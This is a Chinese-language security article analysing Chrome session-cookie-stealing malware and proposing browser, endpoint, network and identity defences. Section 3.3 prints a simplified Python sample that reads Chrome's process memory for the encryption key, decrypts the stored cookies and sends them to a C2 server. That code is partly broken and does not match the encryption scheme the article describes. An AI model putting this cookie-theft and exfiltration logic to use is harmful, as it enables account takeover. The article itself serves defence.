
摘要随着网络认证技术的演进基于会话 Cookie 的身份劫持已成为恶意软件实施账户接管的主流手段。本文以 2026 年 6 月 Malwarebytes 披露的 Chrome 会话 Cookie 窃取恶意软件为研究对象系统分析此类恶意软件的攻击流程、技术原理与危害表现深入剖析 Chrome 浏览器会话 Cookie 的存储加密机制及恶意软件的绕过技术结合真实攻击样本揭示会话窃取到账户接管的完整链路最后从终端、网络、身份管理及浏览器安全机制升级四个维度构建防御体系。研究表明当前基于应用绑定加密的防护机制已被新型恶意软件突破硬件绑定会话凭证技术成为抵御此类攻击的关键方向。反网络钓鱼技术专家芦笛指出会话 Cookie 窃取攻击的产业化趋势显著需构建多层次协同防御体系以应对威胁。1 引言在数字化办公与网络服务深度融合的背景下浏览器已成为用户访问网络资源、处理业务数据的核心入口。为提升用户体验主流浏览器采用会话 Cookie 技术维持用户登录状态无需重复输入账号密码。会话 Cookie 作为用户已通过身份认证的核心凭证其安全直接关联用户账户与数据安全。近年来恶意软件逐渐从传统密码窃取转向会话 Cookie 窃取此类攻击无需破解用户密码或绕过多因素认证仅通过窃取有效会话 Cookie 即可冒充用户身份实现账户接管。2024 年 7 月Chrome 127 版本引入应用绑定加密ABE机制旨在将凭证解密与浏览器进程绑定抵御会话 Cookie 窃取攻击。但 2026 年以来VoidStealer、Storm 等新型恶意软件家族已实现对该机制的有效绕过会话 Cookie 窃取攻击再度泛滥。2026 年 6 月Malwarebytes 发布专项报告披露一款新型恶意软件可绕过 Chrome 安全防护窃取会话 Cookie 并批量传输至攻击者服务器针对企业员工、金融用户及云服务管理员发起定向攻击造成大规模账户泄露与数据被盗事件Malwarebytes。本文基于该报告核心内容结合同类恶意软件技术特征系统研究 Chrome 会话 Cookie 窃取攻击的技术细节、危害及防御方案为网络安全防护提供技术参考。2 Chrome 会话 Cookie 的存储与安全机制2.1 会话 Cookie 的核心作用与生命周期会话 Cookie 是网站服务器向浏览器发送的小型文本数据用于标识用户会话状态存储用户认证信息、会话 ID 及权限数据。用户登录网站后服务器生成唯一会话标识并通过 Cookie 发送至浏览器后续浏览器请求自动携带该 Cookie服务器验证通过后维持用户登录状态无需重复认证。会话 Cookie 生命周期分为生成、存储、传输与销毁四个阶段。生成阶段由服务器在用户认证通过后触发设置 Cookie 的域名、路径、有效期及安全属性存储阶段由浏览器负责Chrome 将会话 Cookie 加密存储于本地数据库文件传输阶段通过 HTTP/HTTPS 协议在浏览器与服务器间传递HTTPS 协议可防止传输过程中被窃听销毁阶段由浏览器在用户退出登录、关闭浏览器或 Cookie 过期时执行清除本地存储数据。2.2 Chrome 会话 Cookie 的存储结构Chrome 浏览器基于 Chromium 内核将会话 Cookie 与其他凭证数据集中存储于用户目录下的特定文件中核心存储路径为%LocalAppData%\Google\Chrome\User Data\Default\Cookies该文件采用 SQLite 数据库格式包含以下关键字段host_keyCookie 所属域名限定 Cookie 的使用范围nameCookie 名称标识具体会话凭证valueCookie 加密内容存储会话 ID 等核心数据encrypted_value加密后的完整 Cookie 数据creation_utcCookie 创建时间expires_utcCookie 过期时间。除 Cookies 文件外Chrome 还将用户密码、自动填充数据等敏感信息存储于 Login Data 文件与 Cookies 文件采用相同加密机制为恶意软件批量窃取凭证提供便利。2.3 Chrome 凭证加密机制演进2.3.1 DPAPI 加密机制早期 Chrome 版本采用 Windows 数据保护 APIDPAPI加密本地存储的 Cookie 与密码数据。DPAPI 是 Windows 系统提供的加密服务基于用户登录密码生成密钥加密数据与用户身份绑定仅当前用户可解密数据。该机制虽能防止跨用户窃取但存在明显缺陷恶意软件获取当前用户权限后可直接调用 DPAPI 接口解密数据无需破解用户密码导致凭证安全防护失效。2.3.2 应用绑定加密ABE机制为应对 DPAPI 加密被绕过的问题Chrome 127 版本2024 年 7 月引入应用绑定加密ABE机制核心设计理念是将凭证解密操作与 Chrome 浏览器进程绑定。ABE 机制在原有 DPAPI 加密基础上新增进程校验逻辑浏览器进程解密凭证时需验证当前进程是否为 Chrome 官方进程校验通过后才能完成解密恶意软件注入外部进程或伪造进程时校验失败无法解密凭证。ABE 机制的核心实现逻辑包括密钥隔离、进程校验与内存保护三部分。密钥隔离将凭证加密密钥存储于 Chrome 进程专属内存空间禁止外部进程读取进程校验通过校验进程 ID、进程名称及数字签名确保解密操作由合法 Chrome 进程执行内存保护采用内存加密技术防止密钥数据被内存扫描工具窃取。3 新型会话 Cookie 窃取恶意软件攻击机制3.1 恶意软件攻击流程概述2026 年 6 月 Malwarebytes 披露的恶意软件属于信息窃取类恶意软件Infostealer采用无文件攻击与内存执行技术规避传统杀毒软件检测核心攻击流程分为初始入侵、权限提升、凭证窃取、数据外发与会话劫持五个阶段。初始入侵通过钓鱼邮件、恶意软件捆绑、漏洞利用等方式植入目标设备伪装成正常程序规避检测权限提升获取当前用户权限部分变种通过进程注入绕过用户权限限制访问浏览器进程内存空间凭证窃取绕过 Chrome ABE 加密机制读取本地 Cookies 文件或直接从浏览器进程内存提取解密后的会话 Cookie数据外发将窃取的会话 Cookie、密码等数据加密后传输至攻击者控制的 C2 服务器会话劫持攻击者利用窃取的会话 Cookie通过代理服务器冒充用户身份登录目标账户实施恶意操作。3.2 ABE 加密机制绕过技术反网络钓鱼技术专家芦笛强调新型恶意软件的核心突破在于实现了对 Chrome ABE 加密机制的高效绕过其技术核心是内存密钥提取与进程伪装无需破解加密算法即可获取明文会话 Cookie。3.2.1 内存密钥提取技术Chrome ABE 机制的加密密钥虽隔离于浏览器进程内存但在进程运行期间密钥数据会以明文形式存在于内存中用于凭证解密操作。恶意软件利用 Windows 调试接口DebugActiveProcess以调试器身份附加至 Chrome 进程扫描进程内存空间定位并提取 ABE 加密主密钥。该技术的核心优势在于无需注入恶意代码仅通过系统原生调试接口即可读取内存数据规避进程注入行为检测。同时恶意软件采用内存扫描过滤技术精准定位密钥特征数据减少内存扫描时间降低被 EDR 工具检测的概率。3.2.2 进程伪装与解密劫持部分恶意软件变种采用进程伪装技术伪造 Chrome 进程身份绕过 ABE 机制的进程校验逻辑。恶意软件创建与 Chrome 进程名称、进程 ID 及数字签名一致的伪造进程调用 Chrome 解密接口提交加密 Cookie 数据欺骗 ABE 机制完成解密操作获取明文会话 Cookie。此外恶意软件还可通过劫持浏览器进程的解密函数在解密操作完成后、数据返回浏览器前截取明文 Cookie 数据实现凭证窃取。该技术无需读取内存密钥直接劫持解密流程隐蔽性更强。3.3 会话 Cookie 窃取实现代码示例以下为恶意软件窃取 Chrome 会话 Cookie 的核心代码逻辑基于 Windows 平台采用 Python 实现模拟内存密钥提取与 Cookie 解密过程import sqlite3import win32cryptimport psutilfrom ctypes import *# 定义Chrome进程名称与Cookies文件路径CHROME_PROCESS chrome.exeCOOKIES_PATH r%LocalAppData%\Google\Chrome\User Data\Default\Cookies# 提取Chrome进程内存中的ABE密钥def extract_abe_key():for proc in psutil.process_iter([pid, name]):if proc.name().lower() CHROME_PROCESS:pid proc.pid# 附加至Chrome进程作为调试器h_process windll.kernel32.OpenProcess(0x1F0FFF, False, pid)# 扫描内存定位ABE密钥简化逻辑实际需匹配密钥特征key_data scan_memory(h_process)windll.kernel32.CloseHandle(h_process)return key_datareturn None# 解密Chrome会话Cookiedef decrypt_cookies():# 替换环境变量获取真实路径cookies_file os.path.expandvars(COOKIES_PATH)# 连接Cookies数据库conn sqlite3.connect(cookies_file)cursor conn.cursor()cursor.execute(SELECT host_key, name, encrypted_value FROM cookies)abe_key extract_abe_key()if not abe_key:return []cookies []for host, name, encrypted_data in cursor.fetchall():# 利用提取的ABE密钥解密Cookie数据decrypted_data win32crypt.CryptUnprotectData(encrypted_data, None, abe_key, None, 0)[1].decode(utf-8, errorsignore)cookies.append({host: host, name: name, value: decrypted_data})conn.close()return cookies# 主函数窃取并输出会话Cookieif __name__ __main__:stolen_cookies decrypt_cookies()for cookie in stolen_cookies:print(f域名: {cookie[host]}, Cookie名称: {cookie[name]}, 内容: {cookie[value]})# 外发数据至C2服务器简化逻辑send_to_c2(stolen_cookies)该代码实现了 Chrome 进程密钥提取、Cookies 数据库读取与数据解密核心功能实际恶意软件会添加进程隐藏、流量加密、对抗 EDR 检测等模块提升攻击隐蔽性与成功率。3.4 数据外发与会话劫持恶意软件窃取会话 Cookie 后采用加密传输方式将数据外发至攻击者 C2 服务器规避网络流量检测。外发数据包含会话 Cookie、用户账号信息、设备指纹等数据攻击者可通过专用平台批量管理窃取的会话凭证。会话劫持阶段攻击者利用窃取的会话 Cookie通过地理位置匹配的 SOCKS5 代理服务器模拟用户设备环境与网络位置登录目标账户。由于会话 Cookie 已通过服务器认证攻击者无需输入密码或通过多因素认证即可获得用户账户的完全控制权实施窃取数据、篡改信息、冒充用户交易等恶意操作。4 攻击危害与典型场景4.1 个人用户账户安全威胁对于个人用户会话 Cookie 窃取攻击直接导致社交账号、电商账号、金融账户被盗用。攻击者可利用窃取的会话 Cookie 登录用户微信、微博等社交账号发布不良信息、诈骗好友登录淘宝、京东等电商账号盗用用户余额、积分购物登录网上银行、支付平台转移用户资金造成直接经济损失。此外恶意软件窃取的 Cookie 可能包含用户隐私数据如浏览记录、收货地址、联系方式等被攻击者用于精准诈骗或黑市交易严重侵犯用户隐私权益。4.2 企业办公系统入侵风险企业员工设备被入侵后恶意软件可窃取企业邮箱、OA 系统、云服务平台AWS、GCP、Azure、VPN 等系统的会话 Cookie。攻击者利用这些凭证绕过企业防火墙与访问控制策略潜入企业内部网络窃取商业机密、客户数据、财务信息等核心资产导致企业数据泄露、业务中断甚至引发法律纠纷与品牌声誉受损。反网络钓鱼技术专家芦笛指出企业环境中会话 Cookie 窃取攻击的危害具有连锁效应单个员工设备被攻陷可能导致整个企业网络被渗透核心业务系统面临全面失控风险Malwarebytes。4.3 供应链与定向攻击威胁新型会话 Cookie 窃取恶意软件具备定向攻击能力可针对特定行业、企业或高价值用户发起精准攻击。攻击者通过钓鱼邮件、恶意广告等方式向目标人群投放恶意软件窃取核心人员的会话凭证实施供应链攻击或商业间谍活动。例如针对金融行业的定向攻击中恶意软件专门窃取银行高管、金融从业者的网上银行、证券交易系统会话 Cookie攻击者利用这些凭证进行非法交易、内幕交易等违法活动破坏金融市场秩序。5 防御体系构建5.1 浏览器安全机制升级5.1.1 设备绑定会话凭证DBSC技术为应对会话 Cookie 窃取攻击Chrome 146 版本2026 年 4 月推出设备绑定会话凭证DBSC技术从根本上解决会话 Cookie 被窃取后滥用的问题。DBSC 技术基于硬件安全模块Windows 平台 TPM 2.0 芯片、macOS 平台 Secure Enclave将会话凭证与设备硬件绑定核心实现逻辑如下用户登录支持 DBSC 的网站时Chrome 在硬件安全模块内生成唯一密钥对私钥永不导出硬件服务器颁发与公钥绑定的短期会话 Cookie需定期刷新刷新会话时Chrome 需提供私钥完成加密校验校验通过才能获取新 Cookie窃取的 Cookie 在其他设备上无法通过硬件校验直接失效。DBSC 技术彻底阻断了窃取会话 Cookie 的复用路径即使恶意软件成功窃取 Cookie也无法在攻击者设备上使用大幅降低攻击成功率。5.1.2 浏览器安全配置优化用户需优化 Chrome 浏览器安全配置降低恶意软件攻击面及时更新浏览器至最新版本启用 DBSC、ABE 等安全机制禁用浏览器自动保存密码功能减少敏感数据存储开启网站 Cookie 安全属性设置 HttpOnly、Secure、SameSiteStrict防止 Cookie 被脚本窃取或跨站请求伪造定期清理浏览器 Cookie 与缓存数据减少会话凭证泄露风险。5.2 终端安全防护5.2.1 终端检测与响应EDR规则优化企业需部署 EDR 工具配置针对性检测规则监控恶意软件攻击行为监控进程调试行为告警非官方调试工具如 WinDbg、Visual Studio对 Chrome 进程的调试附加操作监控隐藏浏览器进程告警 Chrome 进程以隐藏窗口SW_HIDE、屏幕外位置启动的行为监控异常 DPAPI 调用与内存扫描行为告警非授权进程读取浏览器内存数据的操作监控进程注入行为告警向 Chrome 进程注入未签名 DLL 或恶意代码的操作。5.2.2 终端环境加固加强终端系统安全配置阻断恶意软件入侵路径禁用不必要的系统服务与 ActiveX 控件减少漏洞攻击面开启 PowerShell 约束模式与日志审计防止恶意脚本执行限制普通用户权限禁止普通用户修改系统配置、写入启动项部署杀毒软件与防火墙实时拦截恶意软件与异常网络流量。5.3 网络安全防护5.3.1 恶意流量检测与拦截监控终端外发网络流量拦截恶意软件数据外发行为基于威胁情报拦截恶意软件 C2 服务器 IP 与域名监控终端向陌生服务器传输加密数据的行为告警异常外发流量部署邮件网关拦截携带恶意附件、钓鱼链接的邮件阻断恶意软件初始入侵路径。5.3.2 网络访问控制优化网络访问策略减少攻击者横向移动与会话劫持风险部署零信任架构实行 “最小权限访问” 原则即使凭证泄露攻击者也无法访问非授权资源启用 VPN 多因素认证监控 VPN 登录设备与网络位置告警异常登录行为限制内部网络对互联网的访问权限仅开放必要端口与服务。5.4 身份与数据安全管理5.4.1 多因素认证MFA部署在关键系统强制启用多因素认证即使会话 Cookie 泄露攻击者也需通过额外认证才能访问敏感资源。优先选择硬件令牌、生物识别等安全性较高的认证方式避免短信验证码等易被绕过的认证方式。5.4.2 会话安全管理优化网站会话管理策略缩短会话 Cookie 有效期减少泄露后滥用窗口实时监控会话登录行为对异地登录、异常设备登录、短时间内多次登录等行为进行二次认证或直接拦截定期强制用户重新登录降低长期会话泄露风险。6 结论本文基于 2026 年 6 月 Malwarebytes 披露的 Chrome 会话 Cookie 窃取恶意软件系统研究了此类攻击的技术机制、危害及防御方案。研究发现新型恶意软件通过内存密钥提取、进程伪装等技术成功绕过 Chrome ABE 加密机制实现会话 Cookie 的高效窃取攻击流程呈现产业化、隐蔽化、定向化特征对个人用户与企业网络安全构成严重威胁。反网络钓鱼技术专家芦笛强调会话 Cookie 窃取攻击的演进表明单一安全机制难以抵御新型威胁需构建 “浏览器防护 终端检测 网络拦截 身份加固” 的多层次协同防御体系Malwarebytes。Chrome DBSC 技术通过硬件绑定会话凭证从根本上阻断了窃取 Cookie 的复用路径是抵御此类攻击的核心技术方向同时用户与企业需加强安全意识及时更新系统与浏览器优化安全配置降低攻击风险。未来随着硬件安全技术的普及与安全防护体系的完善会话 Cookie 窃取攻击的成功率将逐步降低但攻击者也会持续探索新的绕过技术。因此网络安全防护需保持动态演进持续跟踪恶意软件技术趋势优化防御策略构建全方位、常态化的安全防护体系有效应对不断演变的网络安全威胁。编辑芦笛公共互联网反网络钓鱼工作组